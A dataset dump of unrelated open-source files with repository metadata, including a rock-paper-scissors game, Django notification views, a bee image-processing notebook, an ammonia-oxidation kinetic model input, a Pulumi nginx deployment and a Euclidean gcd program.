53cad8638861d7fa92d08025c7e2417ff6e4d9d6 | c71a7ea09fcfea74f99acc05ce86f693dc965a36 | /2day/6-石头剪刀布面向对象.py | 769b9479be98a4306976bc56467ee3a5212ac1ec | [] | no_license | fengshuai1/1807-2 | fe7a00ef2ae313d62ed3839d78024d3b19cbe29d | 1324e8816069fce347bb2d3b86eb28707f361752 | refs/heads/master | 2018-10-31T22:04:47.907942 | 2018-08-24T09:19:47 | 2018-08-24T09:19:47 | 143,669,019 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 500 | py | class cai():
def quan(self):
i = 0
while i < 5:
import random
computer = random.randint(1,3)#电脑玩家
player = int(input("请输入1:石头 2:剪子 3:布"))
if player <= 3 and player > 0:
if (player ==1 and computer == 2) or (player == 2 and computer == 3) or(player == 3 and computer ==1):
print("你赢了")
elif player == computer:
print("平局")
else:
print("你输了")
else:
print("输入不合法")
i+=1 #i = i+1
a = cai()
a.quan()
| [
"1329008013@qq.com"
] | 1329008013@qq.com |
c7504158f4edfcfc872c347ef1008a5dd2785a0e | 58fa446d96123c0b4215e837f3d65edb047796b7 | /authors/apps/notifications/views.py | 5829a33f6cf737b6af43a5c47084b597caafccd8 | [
"BSD-3-Clause"
] | permissive | andela/ah-the-jedi-backend | 36eddbb39c02e65690a58a4c9e3aa232e13d3faa | ba429dfcec577bd6d52052673c1c413835f65988 | refs/heads/develop | 2022-12-09T04:32:10.162632 | 2019-06-19T07:48:16 | 2019-06-19T07:48:16 | 180,952,374 | 1 | 8 | BSD-3-Clause | 2022-12-08T05:01:29 | 2019-04-12T07:16:19 | Python | UTF-8 | Python | false | false | 4,239 | py | from rest_framework import status
from rest_framework.response import Response
from rest_framework.exceptions import NotFound
from rest_framework.generics import (
RetrieveAPIView, RetrieveUpdateAPIView, UpdateAPIView)
from rest_framework.permissions import IsAuthenticated
from . import utils
from .serializers import NotificationSerializer, SubscriptionsSerializer
from ..authentication.messages import errors
def retreive_notifications(username, request, read=None):
"""
This method retreive notifications
fetches read, unread and all
notifications based on the parameters
provided
"""
paginator = utils.PageNumberPaginationNotifications()
paginator.page_size = request.GET.get('limit', '9')
user = utils.get_user(username)
notifications = utils.get_notification(user, read=read)
count = notifications.count()
page = paginator.paginate_queryset(notifications, request)
serializer = NotificationSerializer(page, many=True)
response = paginator.get_paginated_response(data=serializer.data)
return response if count else Response(
{"notifications": "You do not have any notifications"})
class NotificationRetreiveView(RetrieveAPIView):
"""
get:
Get all user notifications
"""
permission_classes = (IsAuthenticated,)
serializer_class = NotificationSerializer
def retrieve(self, request):
"""
get:
Fetch all user notifications
"""
return retreive_notifications(request.user.username, request, None)
class ReadRetreiveView(RetrieveAPIView):
"""
get:
Get all read user notifications
"""
permission_classes = (IsAuthenticated,)
serializer_class = NotificationSerializer
def retrieve(self, request):
"""
get:
Fetch all read user notifications
"""
return retreive_notifications(request.user.username, request, True)
class UnreadRetreiveView(RetrieveAPIView):
"""
get:
Get all unread user notifications
"""
permission_classes = (IsAuthenticated,)
serializer_class = NotificationSerializer
def retrieve(self, request):
"""
get:
Fetch all unread user notifications
"""
return retreive_notifications(request.user.username, request, False)
class ReadUpdateView(UpdateAPIView):
"""
put:
read user notification
"""
permission_classes = (IsAuthenticated,)
serializer_class = NotificationSerializer
def update(self, request, pk):
"""
put:
read user notification
"""
serializer_data = {"read": "True"}
notifications = utils.get_notification(user=pk, single=True)
if not notifications:
raise NotFound(errors["notification_missing"])
utils.check_is_object_owner(notifications, request)
serializer = self.serializer_class(
notifications, data=serializer_data, partial=True)
serializer.is_valid(raise_exception=True)
serializer.save()
response = {"notification": serializer.data}
return Response(response, status=status.HTTP_200_OK)
class SubscriptionUpdateView(RetrieveUpdateAPIView):
"""
get:
Get user subscriptions
put:
Update user subscriptions
"""
permission_classes = (IsAuthenticated,)
serializer_class = SubscriptionsSerializer
def retrieve(self, request):
"""
get:
Fetch user subscriptions
"""
user = utils.get_subscriptions(request.user)
serializer = self.serializer_class(user)
response = {"subscriptions": serializer.data}
return Response(response, status=status.HTTP_200_OK)
def update(self, request):
"""
put:
Update user subscriptions
"""
serializer_data = request.data
user = utils.get_subscriptions(request.user)
serializer = self.serializer_class(
user, data=serializer_data, partial=True)
serializer.is_valid(raise_exception=True)
serializer.save()
response = {"subscriptions": serializer.data}
return Response(response, status=status.HTTP_200_OK)
| [
"leewelkarani@gmail.com"
] | leewelkarani@gmail.com |
de1665592aca7a34f328a8dca62e4afadb4b1ada | e385a3bd278fc6add76c430038fdd6000b6ea715 | /B_Search_Algorithms/A_Algorithms/search_linear.py | f61b22b596672b534837c5bc13c1038131e9113f | [
"MIT"
] | permissive | Oscar-Oliveira/Data-Structures-and-Algorithms | e781bcc34abe2a05113b457c48e836072d67100e | 4f75a5aa1e525a5b59944a2cc15f670f0b216a80 | refs/heads/master | 2021-09-26T08:43:51.711847 | 2018-10-28T08:40:10 | 2018-10-28T08:40:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 487 | py | """
LinearSearch
"""
from A_Algorithms.search_adt import Search
class LinearSearch(Search):
"""Linear search"""
def search(self):
self.comparisons = 0
for pos, value in enumerate(self.list):
self.comparisons += 1
if value == self.item:
return pos
return -1
@staticmethod
def WorstCase(size):
return size - 1
@staticmethod
def MaxSteps(size):
return size
| [
"oscar.m.oliveira@gmail.com"
] | oscar.m.oliveira@gmail.com |
39d20c713a81720831c70ea072ce908e1050a6fa | b1bb668c24f4d31e454077742a75087af0bf5403 | /apps/clock/urls.py | d90bbdb916dae368e201e90413174873a67508fd | [] | no_license | ricopineda/Time-Display | 61ab5801b91b2eb96166594a13199407c0df7474 | d75137a88c2d47637254fc47094981c2550ad7bc | refs/heads/master | 2021-01-16T19:56:59.588346 | 2017-08-13T16:30:01 | 2017-08-13T16:30:01 | 100,189,841 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 108 | py | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.index),
] | [
"ricopineda@me.com"
] | ricopineda@me.com |
b1bfc2f65f85da0da1fe9ff036a267abd7d4db0a | 285d617fdeeaab2e117b89713965dc7ccbefea08 | /Bees1 - Image Loading and Processing/notebook.py | 7f035469bfc3081e45bf43e622b0c7e3ee825afd | [] | no_license | fbremer/datacamp_bees | c4c83358361dcdcd6911b188388b0772ddcc023d | daf0b2851b876fad04cf43b97a6fdbf656bc1677 | refs/heads/master | 2020-05-18T15:41:51.674328 | 2019-05-20T23:08:10 | 2019-05-20T23:08:10 | 184,507,456 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,799 | py | # ---
# jupyter:
# jupytext:
# formats: ipynb,py:light
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.4'
# jupytext_version: 1.1.1
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + {"run_control": {"frozen": true}, "tags": ["context"], "deletable": false, "dc": {"key": "3"}, "editable": false, "cell_type": "markdown"}
# # ## 1. Import Python libraries
# # <p><img src="https://s3.amazonaws.com/assets.datacamp.com/production/project_374/img/honey.jpg" alt="honey bee">
# # <em>A honey bee.</em></p>
# # <p>The question at hand is: can a machine identify a bee as a honey bee or a bumble bee? These bees have different <a href="http://bumblebeeconservation.org/about-bees/faqs/honeybees-vs-bumblebees/">behaviors and appearances</a>, but given the variety of backgrounds, positions, and image resolutions it can be a challenge for machines to tell them apart.</p>
# # <p>Being able to identify bee species from images is a task that ultimately would allow researchers to more quickly and effectively collect field data. Pollinating bees have critical roles in both ecology and agriculture, and diseases like <a href="http://news.harvard.edu/gazette/story/2015/07/pesticide-found-in-70-percent-of-massachusetts-honey-samples/">colony collapse disorder</a> threaten these species. Identifying different species of bees in the wild means that we can better understand the prevalence and growth of these important insects.</p>
# # <p><img src="https://s3.amazonaws.com/assets.datacamp.com/production/project_374/img/bumble.jpg" alt="bumble bee">
# # <em>A bumble bee.</em></p>
# # <p>This notebook walks through loading and processing images. After loading and processing these images, they will be ready for building models that can automatically detect honeybees and bumblebees.</p>
# + {"tags": ["sample_code"], "dc": {"key": "3"}}
# Used to change filepaths
from pathlib import Path
# We set up matplotlib, pandas, and the display function
# %matplotlib inline
import matplotlib.pyplot as plt
from IPython.display import display
import pandas as pd
# import numpy to use in this cell
import numpy as np
# import Image from PIL so we can use it later
from PIL import Image
# generate test_data
test_data = np.random.beta(a=1, b=1, size=(100, 100, 3))
# display the test_data
plt.imshow(test_data)
# + {"run_control": {"frozen": true}, "tags": ["context"], "deletable": false, "dc": {"key": "10"}, "editable": false, "cell_type": "markdown"}
# # ## 2. Opening images with PIL
# # <p>Now that we have all of our imports ready, it is time to work with some real images.</p>
# # <p>Pillow is a very flexible image loading and manipulation library. It works with many different image formats, for example, <code>.png</code>, <code>.jpg</code>, <code>.gif</code> and more. For most image data, one can work with images using the Pillow library (which is imported as <code>PIL</code>).</p>
# # <p>Now we want to load an image, display it in the notebook, and print out the dimensions of the image. By dimensions, we mean the width of the image and the height of the image. These are measured in pixels. The documentation for <a href="https://pillow.readthedocs.io/en/5.1.x/reference/Image.html">Image</a> in Pillow gives a comprehensive view of what this object can do.</p>
# + {"tags": ["sample_code"], "dc": {"key": "10"}}
# open the image
img = Image.open("datasets/bee_1.jpg")
# Get the image size
img_size = img.size
print("The image size is: {}".format(img_size))
# Just having the image as the last line in the cell will display it in the notebook
img
# + {"run_control": {"frozen": true}, "tags": ["context"], "deletable": false, "dc": {"key": "17"}, "editable": false, "cell_type": "markdown"}
# # ## 3. Image manipulation with PIL
# # <p>Pillow has a number of common image manipulation tasks built into the library. For example, one may want to resize an image so that the file size is smaller. Or, perhaps, convert an image to black-and-white instead of color. Operations that Pillow provides include:</p>
# # <ul>
# # <li>resizing</li>
# # <li>cropping</li>
# # <li>rotating</li>
# # <li>flipping</li>
# # <li>converting to greyscale (or other <a href="https://pillow.readthedocs.io/en/5.1.x/handbook/concepts.html#concept-modes">color modes</a>)</li>
# # </ul>
# # <p>Often, these kinds of manipulations are part of the pipeline for turning a small number of images into more images to create training data for machine learning algorithms. This technique is called <a href="http://cs231n.stanford.edu/reports/2017/pdfs/300.pdf">data augmentation</a>, and it is a common technique for image classification.</p>
# # <p>We'll try a couple of these operations and look at the results.</p>
# + {"tags": ["sample_code"], "dc": {"key": "17"}}
# Crop the image to 25, 25, 75, 75
img_cropped = img.crop(box=(25, 25, 75, 75))
display(img_cropped)
# rotate the image by 45 degrees
img_rotated = img.rotate(angle=45)
display(img_rotated)
# flip the image left to right
img_flipped = img.transpose(method=Image.FLIP_LEFT_RIGHT)
display(img_flipped)
# + {"run_control": {"frozen": true}, "tags": ["context"], "deletable": false, "dc": {"key": "24"}, "editable": false, "cell_type": "markdown"}
# # ## 4. Images as arrays of data
# # <p>What is an image? So far, PIL has handled loading images and displaying them. However, if we're going to use images as data, we need to understand what that data looks like.</p>
# # <p>Most image formats have three color <a href="https://en.wikipedia.org/wiki/RGB_color_model">"channels": red, green, and blue</a> (some images also have a fourth channel called "alpha" that controls transparency). For each pixel in an image, there is a value for every channel.</p>
# # <p><img src="https://s3.amazonaws.com/assets.datacamp.com/production/project_374/img/AdditiveColor.png" alt="RGB Colors"></p>
# # <p>The way this is represented as data is as a three-dimensional matrix. The width of the matrix is the width of the image, the height of the matrix is the height of the image, and the depth of the matrix is the number of channels. So, as we saw, the height and width of our image are both 100 pixels. This means that the underlying data is a matrix with the dimensions <code>100x100x3</code>.</p>
# + {"tags": ["sample_code"], "dc": {"key": "24"}}
# Turn our image object into a NumPy array
img_data = np.array(img)
# get the shape of the resulting array
img_data_shape = img_data.shape
print("Our NumPy array has the shape: {}".format(img_data_shape))
# plot the data with `imshow`
plt.imshow(img_data)
plt.show()
# plot the red channel
plt.imshow(img_data[:,:,0], cmap=plt.cm.Reds_r)
plt.show()
# plot the green channel
plt.imshow(img_data[:,:,1], cmap=plt.cm.Greens_r)
plt.show()
# # plot the blue channel
plt.imshow(img_data[:,:,2], cmap=plt.cm.Blues_r)
plt.show()
# + {"run_control": {"frozen": true}, "tags": ["context"], "deletable": false, "dc": {"key": "31"}, "editable": false, "cell_type": "markdown"}
# # ## 5. Explore the color channels
# # <p>Color channels can help provide more information about an image. A picture of the ocean will be more blue, whereas a picture of a field will be more green. This kind of information can be useful when building models or examining the differences between images.</p>
# # <p>We'll look at the <a href="https://en.wikipedia.org/wiki/Kernel_density_estimation">kernel density estimate</a> for each of the color channels on the same plot so that we can understand how they differ.</p>
# # <p>When we make this plot, we'll see that a shape that appears further to the right means more of that color, whereas further to the left means less of that color.</p>
# + {"tags": ["sample_code"], "dc": {"key": "31"}}
def plot_kde(channel, color):
""" Plots a kernel density estimate for the given data.
`channel` must be a 2d array
`color` must be a color string, e.g. 'r', 'g', or 'b'
"""
data = channel.flatten()
return pd.Series(data).plot.density(c=color)
# create the list of channels
channels = ['r', 'g', 'b']
def plot_rgb(image_data):
# use enumerate to loop over colors and indexes
for ix, color in enumerate(channels):
plot_kde(image_data[:, :, ix], color)
plt.show()
plot_rgb(img_data)
# + {"run_control": {"frozen": true}, "tags": ["context"], "deletable": false, "dc": {"key": "38"}, "editable": false, "cell_type": "markdown"}
# # ## 6. Honey bees and bumble bees (i)
# # <p>Now we'll look at two different images and some of the differences between them. The first image is of a honey bee, and the second image is of a bumble bee.</p>
# # <p>First, let's look at the honey bee.</p>
# + {"tags": ["sample_code"], "dc": {"key": "38"}}
# load bee_12.jpg as honey
honey = Image.open('datasets/bee_12.jpg')
# display the honey bee image
display(honey)
# NumPy array of the honey bee image data
honey_data = np.array(honey)
# plot the rgb densities for the honey bee image
plot_rgb(honey_data)
# + {"run_control": {"frozen": true}, "tags": ["context"], "deletable": false, "dc": {"key": "45"}, "editable": false, "cell_type": "markdown"}
# # ## 7. Honey bees and bumble bees (ii)
# # <p>Now let's look at the bumble bee.</p>
# # <p>When one compares these images, it is clear how different the colors are. The honey bee image above, with a blue flower, has a strong peak on the right-hand side of the blue channel. The bumble bee image, which has a lot of yellow for the bee and the background, has almost perfect overlap between the red and green channels (which together make yellow).</p>
# + {"tags": ["sample_code"], "dc": {"key": "45"}}
# load bee_3.jpg as bumble
bumble = Image.open('datasets/bee_3.jpg')
# display the bumble bee image
display(bumble)
# NumPy array of the bumble bee image data
bumble_data = np.array(bumble)
# plot the rgb densities for the bumble bee image
plot_rgb(bumble_data)
# + {"run_control": {"frozen": true}, "tags": ["context"], "deletable": false, "dc": {"key": "52"}, "editable": false, "cell_type": "markdown"}
# # ## 8. Simplify, simplify, simplify
# # <p>While sometimes color information is useful, other times it can be distracting. In this examples where we are looking at bees, the bees themselves are very similar colors. On the other hand, the bees are often on top of different color flowers. We know that the colors of the flowers may be distracting from separating honey bees from bumble bees, so let's convert these images to <a href="https://en.wikipedia.org/wiki/Grayscale">black-and-white, or "grayscale."</a></p>
# # <p>Grayscale is just one of the <a href="https://pillow.readthedocs.io/en/5.0.0/handbook/concepts.html#modes">modes that Pillow supports</a>. Switching between modes is done with the <code>.convert()</code> method, which is passed a string for the new mode.</p>
# # <p>Because we change the number of color "channels," the shape of our array changes with this change. It also will be interesting to look at how the KDE of the grayscale version compares to the RGB version above.</p>
# + {"tags": ["sample_code"], "dc": {"key": "52"}}
# convert honey to grayscale
honey_bw = honey.convert(mode="L")
display(honey_bw)
# convert the image to a NumPy array
honey_bw_arr = np.array(honey_bw)
# get the shape of the resulting array
honey_bw_arr_shape = honey_bw_arr.shape
print("Our NumPy array has the shape: {}".format(honey_bw_arr_shape))
# plot the array using matplotlib
plt.imshow(honey_bw_arr, cmap=plt.cm.gray)
plt.show()
# plot the kde of the new black and white array
plot_kde(honey_bw_arr, 'k')
# + {"run_control": {"frozen": true}, "tags": ["context"], "deletable": false, "dc": {"key": "59"}, "editable": false, "cell_type": "markdown"}
# # ## 9. Save your work!
# # <p>We've been talking this whole time about making changes to images and the manipulations that might be useful as part of a machine learning pipeline. To use these images in the future, we'll have to save our work after we've made changes.</p>
# # <p>Now, we'll make a couple changes to the <code>Image</code> object from Pillow and save that. We'll flip the image left-to-right, just as we did with the color version. Then, we'll change the NumPy version of the data by clipping it. Using the <code>np.maximum</code> function, we can take any number in the array smaller than <code>100</code> and replace it with <code>100</code>. Because this reduces the range of values, it will increase the <a href="https://en.wikipedia.org/wiki/Contrast_(vision)">contrast of the image</a>. We'll then convert that back to an <code>Image</code> and save the result.</p>
# + {"tags": ["sample_code"], "dc": {"key": "59"}}
# flip the image left-right with transpose
honey_bw_flip = honey_bw.transpose(method=Image.FLIP_LEFT_RIGHT)
# show the flipped image
display(honey_bw_flip)
# save the flipped image
honey_bw_flip.save("saved_images/bw_flipped.jpg")
# create higher contrast by reducing range
honey_hc_arr = np.maximum(honey_bw_arr, 100)
# show the higher contrast version
plt.imshow(honey_hc_arr, cmap=plt.cm.gray)
# convert the NumPy array of high contrast to an Image
honey_bw_hc = Image.fromarray(honey_hc_arr)
# save the high contrast version
honey_bw_hc.save("saved_images/bw_hc.jpg")
# + {"run_control": {"frozen": true}, "tags": ["context"], "deletable": false, "dc": {"key": "66"}, "editable": false, "cell_type": "markdown"}
# # ## 10. Make a pipeline
# # <p>Now it's time to create an image processing pipeline. We have all the tools in our toolbox to load images, transform them, and save the results.</p>
# # <p>In this pipeline we will do the following:</p>
# # <ul>
# # <li>Load the image with <code>Image.open</code> and create paths to save our images to</li>
# # <li>Convert the image to grayscale</li>
# # <li>Save the grayscale image</li>
# # <li>Rotate, crop, and zoom in on the image and save the new image</li>
# # </ul>
# + {"tags": ["sample_code"], "dc": {"key": "66"}}
image_paths = ['datasets/bee_1.jpg', 'datasets/bee_12.jpg', 'datasets/bee_2.jpg', 'datasets/bee_3.jpg']
def process_image(path):
img = Image.open(path)
# create paths to save files to
bw_path = "saved_images/bw_{}.jpg".format(path.stem)
rcz_path = "saved_images/rcz_{}.jpg".format(path.stem)
print("Creating grayscale version of {} and saving to {}.".format(path, bw_path))
bw = img.convert(mode="L")
bw.save(bw_path)
print("Creating rotated, cropped, and zoomed version of {} and saving to {}.".format(path, rcz_path))
rcz = img.rotate(45).crop(box=(25, 25, 75, 75)).resize((100, 100))
rcz.save(rcz_path)
# for loop over image paths
for img_path in image_paths:
process_image(Path(img_path))
| [
"forest.bremer@gmail.com"
] | forest.bremer@gmail.com |
4faf46f2328117f85bdcc81f35b2d0f81520a0e9 | b01646abacbef23719926477e9e1dfb42ac0f6a9 | /Rebrov/training/673K/673K_O088N0066_all_Pt111_libraries/input.py | 374655bca2c3f8ed6678fb4189e6d56c8b754ea8 | [] | no_license | Tingchenlee/Test | 41b0fd782f4f611d2b93fda6b63e70956881db33 | 37313c3f594f94cdc64c35e17afed4ae32d3e4e6 | refs/heads/master | 2023-06-02T05:38:32.884356 | 2021-06-10T11:59:02 | 2021-06-10T11:59:02 | 349,764,587 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,496 | py | # Microkinetic model for ammonia oxidation
# E.V. Rebrov, M.H.J.M. de Croon, J.C. Schouten
# Development of the kinetic model of platinum catalyzed ammonia oxidation in a microreactor
# Chemical Engineering Journal 90 (2002) 61–76
database(
thermoLibraries=['surfaceThermoPt111', 'surfaceThermoNi111', 'primaryThermoLibrary', 'thermo_DFT_CCSDTF12_BAC','DFT_QCI_thermo', 'GRI-Mech3.0-N', 'NitrogenCurran', 'primaryNS', 'CHON'],
reactionLibraries = ['Surface/CPOX_Pt/Deutschmann2006','Surface/Nitrogen','Surface/Arevalo_Pt111','Surface/Kraehnert_Pt111','Surface/Mhadeshwar_Pt111','Surface/Novell_Pt111','Surface/Offermans_Pt111','Surface/Rebrov_Pt111','Surface/Scheuer_Pt','Surface/Schneider_Pt111'],
seedMechanisms = [],
kineticsDepositories = ['training'],
kineticsFamilies = ['default'],
kineticsEstimator = 'rate rules',
)
catalystProperties(
metal = 'Pt111'
)
generatedSpeciesConstraints(
allowed=['input species','seed mechanisms','reaction libraries'],
maximumNitrogenAtoms=2,
maximumOxygenAtoms=3,
)
# List of species
species(
label='X',
reactive=True,
structure=adjacencyList("1 X u0"),
)
species(
label='O2',
reactive=True,
structure=adjacencyList(
"""
multiplicity 3
1 O u1 p2 c0 {2,S}
2 O u1 p2 c0 {1,S}
"""),
)
species(
label='H2O',
reactive=True,
structure=SMILES("O"),
)
species(
label='N2',
reactive=True,
structure=SMILES("N#N"),
)
species(
label='NO',
reactive=True,
structure=adjacencyList(
"""
multiplicity 2
1 N u1 p1 c0 {2,D}
2 O u0 p2 c0 {1,D}
"""),
)
species(
label='NH3',
reactive=True,
structure=adjacencyList(
"""
1 N u0 p1 c0 {2,S} {3,S} {4,S}
2 H u0 p0 c0 {1,S}
3 H u0 p0 c0 {1,S}
4 H u0 p0 c0 {1,S}
"""),
)
species(
label='N2O',
reactive=True,
structure=adjacencyList(
"""
1 N u0 p2 c-1 {2,D}
2 N u0 p0 c+1 {1,D} {3,D}
3 O u0 p2 c0 {2,D}
"""),
)
species(
label='He',
reactive=False,
structure=adjacencyList(
"""
1 He u0 p1 c0
"""),
)
#-------------
#temperature from 523-673K
surfaceReactor(
temperature=(673,'K'),
initialPressure=(1.0, 'bar'),
nSims=12,
initialGasMoleFractions={
"NH3": 0.066,
"O2": 0.88,
"He": 0.054,
"NO":0.0,
"H2O":0.0,
"N2O":0.0,
"N2":0.0,
},
initialSurfaceCoverages={
"X": 1.0,
},
surfaceVolumeRatio=(2.8571428e4, 'm^-1'), #A/V = 280µm*π*9mm/140µm*140µm*π*9mm = 2.8571428e4^m-1
terminationConversion = {"NH3":0.99,},
#terminationTime=(10, 's'),
)
simulator( #default for surface reaction atol=1e-18,rtol=1e-12
atol=1e-18, #absolute tolerance are 1e-15 to 1e-25
rtol=1e-12, #relative tolerance is usually 1e-4 to 1e-8
)
model(
toleranceKeepInEdge=0.01, #recommend setting toleranceKeepInEdge to not be larger than 10% of toleranceMoveToCore
toleranceMoveToCore=0.1,
toleranceInterruptSimulation=1e8, #This value should be set to be equal to toleranceMoveToCore unless the advanced pruning feature is desired
#to always enable pruning should be set as a high value, e.g. 1e8
maximumEdgeSpecies=5000, #set up less than 200000
minCoreSizeForPrune=50, #default value
#toleranceThermoKeepSpeciesInEdge=0.5,
minSpeciesExistIterationsForPrune=2, #default value = 2 iteration
)
options(
units='si',
saveRestartPeriod=None,
generateOutputHTML=True,
generatePlots=True,
saveEdgeSpecies=True,
saveSimulationProfiles=True,
) | [
"lee.ting@northeastern.edu"
] | lee.ting@northeastern.edu |
7d388507f08839af659b2f4775cbb45398f53517 | d28d5234b0256e54affcabc5a49a63c9c86cc3dc | /__main__.py | b0a27982f5300f2732c7ce0092e8b52a340afe23 | [] | no_license | somabc/kubernetes-nginx | 352191aa30407f107e15ad30f8e9a45942e32f60 | 0efd7a2065ef457d79878bd5a84f143ec6a3d8e5 | refs/heads/master | 2020-08-03T10:35:01.232045 | 2019-09-29T21:58:49 | 2019-09-29T21:58:49 | 211,721,545 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,355 | py | import pulumi
from pulumi_kubernetes.apps.v1 import Deployment
from pulumi_kubernetes.core.v1 import Service
# Minikube does not implement services of type `LoadBalancer`; require the user to specify if we're
# running on minikube, and if so, create only services of type ClusterIP.
config = pulumi.Config()
is_minikube = config.require_bool("isMinikube")
app_name = "nginx"
app_labels = { "app": app_name }
deployment = Deployment(
app_name,
spec={
"selector": { "match_labels": app_labels },
"replicas": 1,
"template": {
"metadata": { "labels": app_labels },
"spec": { "containers": [{ "name": app_name, "image": "nginx" }] }
}
})
# Allocate an IP to the Deployment.
frontend = Service(
app_name,
metadata={
"labels": deployment.spec["template"]["metadata"]["labels"],
},
spec={
"type": "ClusterIP" if is_minikube else "LoadBalancer",
"ports": [{ "port": 80, "target_port": 80, "protocol": "TCP" }],
"selector": app_labels,
})
# When "done", this will print the public IP.
if is_minikube:
pulumi.export("ip", frontend.spec.apply(lambda v: v["cluster_ip"] if "cluster_ip" in v else None))
else:
pulumi.export("ip", frontend.status.apply(lambda v: v["load_balancer"]["ingress"][0]["ip"] if "load_balancer" in v else None)) | [
"bryan@MacBook-Air.lan"
] | bryan@MacBook-Air.lan |
e2fd657eab66f4cff6903e8c631365e830e32956 | f4fbd41b0272c6161e9a2ffd793fb96631c3f20d | /aries_cloudagent/config/injector.py | 03fbe9195388cd861602f0b2e8e9012fd0eb92b9 | [
"Apache-2.0",
"LicenseRef-scancode-dco-1.1"
] | permissive | The-Insight-Token/aries-cloudagent-python | 946d8b7a2b0aa7a50be1a5a93c8c9caecadf6280 | c84c2615d6513a7ce30e71ae31f632ba112a2b1f | refs/heads/main | 2023-03-19T11:54:51.837163 | 2021-03-10T02:07:07 | 2021-03-10T02:07:07 | 346,390,951 | 1 | 0 | Apache-2.0 | 2021-03-10T14:53:52 | 2021-03-10T14:53:51 | null | UTF-8 | Python | false | false | 3,658 | py | """Standard Injector implementation."""
from typing import Mapping, Optional, Type
from .base import BaseProvider, BaseInjector, InjectionError, InjectType
from .provider import InstanceProvider, CachedProvider
from .settings import Settings
class Injector(BaseInjector):
"""Injector implementation with static and dynamic bindings."""
def __init__(
self, settings: Mapping[str, object] = None, *, enforce_typing: bool = True
):
"""Initialize an `Injector`."""
self.enforce_typing = enforce_typing
self._providers = {}
self._settings = Settings(settings)
@property
def settings(self) -> Settings:
"""Accessor for scope-specific settings."""
return self._settings
@settings.setter
def settings(self, settings: Settings):
"""Setter for scope-specific settings."""
self._settings = settings
def bind_instance(self, base_cls: Type[InjectType], instance: InjectType):
"""Add a static instance as a class binding."""
self._providers[base_cls] = InstanceProvider(instance)
def bind_provider(
self, base_cls: Type[InjectType], provider: BaseProvider, *, cache: bool = False
):
"""Add a dynamic instance resolver as a class binding."""
if not provider:
raise ValueError("Class provider binding must be non-empty")
if cache and not isinstance(provider, CachedProvider):
provider = CachedProvider(provider)
self._providers[base_cls] = provider
def clear_binding(self, base_cls: Type[InjectType]):
"""Remove a previously-added binding."""
if base_cls in self._providers:
del self._providers[base_cls]
def get_provider(self, base_cls: Type[InjectType]):
"""Find the provider associated with a class binding."""
return self._providers.get(base_cls)
def inject(
self,
base_cls: Type[InjectType],
settings: Mapping[str, object] = None,
*,
required: bool = True,
) -> Optional[InjectType]:
"""
Get the provided instance of a given class identifier.
Args:
cls: The base class to retrieve an instance of
params: An optional dict providing configuration to the provider
Returns:
An instance of the base class, or None
"""
if not base_cls:
raise InjectionError("No base class provided for lookup")
provider = self._providers.get(base_cls)
if settings:
ext_settings = self.settings.extend(settings)
else:
ext_settings = self.settings
if provider:
result = provider.provide(ext_settings, self)
else:
result = None
if result is None:
if required:
raise InjectionError(
"No instance provided for class: {}".format(base_cls.__name__)
)
elif not isinstance(result, base_cls) and self.enforce_typing:
raise InjectionError(
"Provided instance does not implement the base class: {}".format(
base_cls.__name__
)
)
return result
def copy(self) -> BaseInjector:
"""Produce a copy of the injector instance."""
result = Injector(self.settings)
result.enforce_typing = self.enforce_typing
result._providers = self._providers.copy()
return result
def __repr__(self) -> str:
"""Provide a human readable representation of this object."""
return f"<{self.__class__.__name__}>"
| [
"cywolf@gmail.com"
] | cywolf@gmail.com |
48b280c792bb3a5a48559a9809391800e32ec0a0 | af15b129708491741c7487dee671821fb9b4656b | /Python/2014/Euclides_con_combinacion_lineal.py | 580f2ea89ce0da07e18b204dd7012845f44571ff | [] | no_license | pdenapo/programitas-algebraI | ccfe67c44e9bc454704cc261a5f01e5f5d1b68fb | addb0f66f56fd6deebcb96226e489ba23c46993f | refs/heads/master | 2021-01-10T05:30:27.114128 | 2020-11-28T00:34:09 | 2020-11-28T00:34:09 | 53,788,303 | 6 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,761 | py | #!/usr/bin/env python3
# Programa en Python 3 que calcula el máximo común divisor
# usando el algoritmo de Euclides, y los coeficientes que permiten
# escribirlo como combinación lineal
# Este programa tiene solamente propósitos didácticos
# (es para mis alumnos de Algebra I).
# (C) 20014-2016 Pablo De Nápoli <pdenapo@dm.uba.ar>
# Este programa es software libre, y usted puede redistribuirlo o
# modificarlo libremente bajo los términos de la
# GNU General Public Licence (Licencia Pública General), versión 3
# o cualquier versión posterior,
# publicada por la Free Software Foundation. Vea:
#
# http://www.gnu.org/copyleft/gpl.html
import argparse
def chequea_invariante(a,b,alfa_a_b,beta_a_b,mcd_a_b):
# chequea el invariante del algoritmo
print("alfa(",a,",",b,")=",alfa_a_b,end=', ')
print("beta(",a,",",b,")=",beta_a_b,end=', ')
print("mcd(",a,",",b,")=",mcd_a_b)
print(mcd_a_b,"=",alfa_a_b,"*",a,"+",beta_a_b,"*",b)
def mcd_con_combinacion_lineal(a,b):
if b>a:
return mcd_con_combinacion_lineal(b,a)
if b==0:
alfa_a_b=1
beta_a_b=0
mcd_a_b=a
else:
q,r=divmod(a,b)
alfa_b_r, beta_b_r, mcd_b_r = mcd_con_combinacion_lineal(b,r)
alfa_a_b = beta_b_r
beta_a_b = alfa_b_r - beta_b_r * q
mcd_a_b = mcd_b_r
chequea_invariante (a,b,alfa_a_b,beta_a_b,mcd_a_b)
return (alfa_a_b,beta_a_b,mcd_a_b)
parser = argparse.ArgumentParser(description='Calcula el máximo común divisor usando el algoritmo de Euclides y lo escibe como una combinación lineal')
parser.add_argument("a", type=int)
parser.add_argument("b", type=int)
args=parser.parse_args()
print("Calculamos el máximo común divisor entre ",args.a," y ",args.b)
mcd_con_combinacion_lineal(args.a,args.b)
| [
"pdenapo@gmail.com"
] | pdenapo@gmail.com |
